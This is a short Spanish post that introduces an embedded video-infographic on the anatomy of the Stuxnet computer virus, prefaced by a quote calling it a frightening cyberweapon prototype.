"un prototipo funcional y aterrador de un arma cibernética que conducirá a la creación de una nueva carrera armamentística mundial"
El siguiente vídeo-infografía detalla la anatomía del que posiblemente sea uno de los virus más relevantes de la historia de la seguridad informática:

Stuxnet: Anatomy of a Computer Virus from Patrick Clair on Vimeo.